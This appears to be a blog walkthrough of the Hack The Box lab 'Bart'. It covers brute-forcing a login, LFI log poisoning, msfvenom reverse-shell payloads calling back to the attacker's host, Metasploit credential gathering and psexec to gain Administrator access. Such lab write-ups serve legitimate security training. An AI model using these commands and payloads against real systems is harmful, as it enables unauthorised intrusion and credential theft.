Hello friends!! Today we are going to solve another CTF challenge, “Bart”, which is available online for those who want to increase their skill in penetration testing and black box testing. Bart is a retired vulnerable lab presented by Hack The Box for online penetration testing practice according to your experience level; they have a collection of vulnerable labs as challenges from beginner to Expert level.
Level: Expert
Task: find the user.txt and root.txt files on the victim’s machine.
Since these labs are available online, they have static IPs. The IP of Bart is 10.10.10.81, so let’s begin with nmap port enumeration of all TCP ports with service detection.
nmap -sV -p- 10.10.10.81
From the image below, you can observe that only port 80 is open on the target system.
As port 80 is running HTTP, we open the IP address in our browser. As soon as we do, we get redirected to “forum.bart.htb”.
Since HTB doesn’t have global DNS, we aren’t going to be able to resolve that name. So we add an entry to our /etc/hosts file pointing 10.10.10.81 to both bart.htb and forum.bart.htb.
When we open forum.bart.htb, we find a website built on WordPress.
When we open bart.htb it redirects us to forum.bart.htb. We enumerate directories on both domains and find a directory called “/monitor” on bart.htb.
dirb http://bart.htb/
When we open the /monitor directory found by the dirb scan, we find a login page.
We use Burp Suite to brute-force the login page with the /usr/share/wordlists/metasploit/common-root.txt dictionary and find the credentials to be harvey:potter.
We log in using these credentials and get redirected to a different domain, monitor.bart.htb.
We add monitor.bart.htb to our /etc/hosts file as well.
Now when we refresh the page we get a server monitoring page.
Going through the monitoring page we find a link to another internal host, internal-01.bart.htb, which we also add to /etc/hosts.
We now open internal-01.bart.htb and find a
login form.
We capture the login request using Burp Suite and modify it by changing login.php to register.php. The registration endpoint exists even though nothing links to it, and it accepts the same username and password fields, so the forwarded request creates a new account. Then we log in using the credentials we registered and find a chat box.
We find a link to an open log file. The log viewer includes the log it displays, so it looks like it may be vulnerable to LFI.
Now we use log poisoning to get a reverse shell. We change the User-Agent header to PHP code that runs the whoami command; the viewer writes the header into the log and executes it when the log is included again, and we get the user name back.
We were not able to get a shell directly through this command injection, so we first create a reverse shell executable using msfvenom.
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.6 lport=4444 -f exe > shell.exe
After creating our shell, we download the payload to the target machine using PowerShell. First we set up an HTTP server using Python (this is the Python 2 module; on Python 3 the equivalent is python3 -m http.server 80).
python -m SimpleHTTPServer 80
We set up our listener using Metasploit before executing the payload on the target machine.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.6
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > run
We now execute the payload through the log poisoning, using the PowerShell download-and-run command as the injected command. As soon as the payload runs we get our reverse shell.
After we get the reverse shell we find that the system is 64-bit, while the meterpreter we are running is the 32-bit x86 build, so we inject a 64-bit payload into the existing session with the payload_inject local module.
msf > use windows/local/payload_inject
msf exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/payload_inject) > set lhost 10.10.14.6
msf exploit(windows/local/payload_inject) > set lport 1234
msf exploit(windows/local/payload_inject) > set session 1
msf exploit(windows/local/payload_inject) > run
After running the exploit, we get a 64-bit
meterpreter shell. Now we can run post modules properly as 32-bit meterpreter
was running into problems.
We use the windows_autologin post module to read the stored autologon password of the Administrator user from the registry.
msf > use windows/gather/credentials/windows_autologin
msf post(windows/gather/credentials/windows_autologin) > set session 2
msf post(windows/gather/credentials/windows_autologin) > run
Now, enumerating the target machine, we find that port 445 is listening but is not reachable from outside. So we use meterpreter port forwarding: local port 443 on our machine is forwarded through the session to port 445 on the target, and we can then connect to it from our own tools.
meterpreter > portfwd add -l 443 -p 445 -r 10.10.10.81
Now we use impacket-smbserver to create an SMB server on our machine, sharing /root as “hack”, so that we can serve our payload to the target machine over SMB.
impacket-smbserver hack /root
The session we had earlier has died, so port 4444 is free. We are going to reuse the same payload to get our reverse shell. First we run Metasploit in a new tab and set up our listener.
msf > use multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.6
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > run
Then we use the psexec_command auxiliary module against the forwarded port with the Administrator password, telling it to run shell.exe straight from our SMB share.
msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(admin/smb/psexec_command) > set SMBUser Administrator
msf auxiliary(admin/smb/psexec_command) > set SMBPass 3130438f31186fbaf962f407711faddb
msf auxiliary(admin/smb/psexec_command) > set COMMAND \\\\10.10.14.6\\\hack\\\shell.exe
msf auxiliary(admin/smb/psexec_command) > set rhosts 127.0.0.1
msf auxiliary(admin/smb/psexec_command) > set rport 443
msf auxiliary(admin/smb/psexec_command) > run
As soon as we run the psexec auxiliary module we get a reverse shell as Administrator.
In c:\Users\Administrator\Desktop we find a file called root.txt; when we open it we find our first flag.
Enumerating the system, in c:\Users\h.potter we find a file called user.txt. When we take a look at the contents of the file we get our second flag.